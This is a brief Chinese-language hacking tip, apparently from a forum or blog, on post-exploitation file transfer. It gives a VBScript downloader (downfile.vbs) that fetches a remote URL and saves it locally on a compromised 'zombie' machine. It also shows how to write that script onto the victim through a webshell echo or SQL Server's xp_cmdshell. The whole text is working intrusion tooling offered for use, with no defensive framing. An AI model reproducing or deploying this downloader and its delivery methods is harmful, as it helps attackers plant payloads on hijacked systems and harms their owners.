拿到shell以后上传下载文件是个难题,下面的代码可以控制肉鸡自动下载文件。
远程下载脚本downfile.vbs
远程下载脚本downfile.vbs
On Error Resume Next Dim iRemote,iLocal iLocal = LCase(WScript.Arguments(1)) iRemote = LCase(WScript.Arguments(0)) Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET",iRemote,0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile iLocal,2 |
在webshell里面直接 echo ... >>c:/downfile.vbs就可以生成了,而sql server中可以用exec master.. xp_cmdshell ’echo ... >>c:/downfile.vbs ’。 |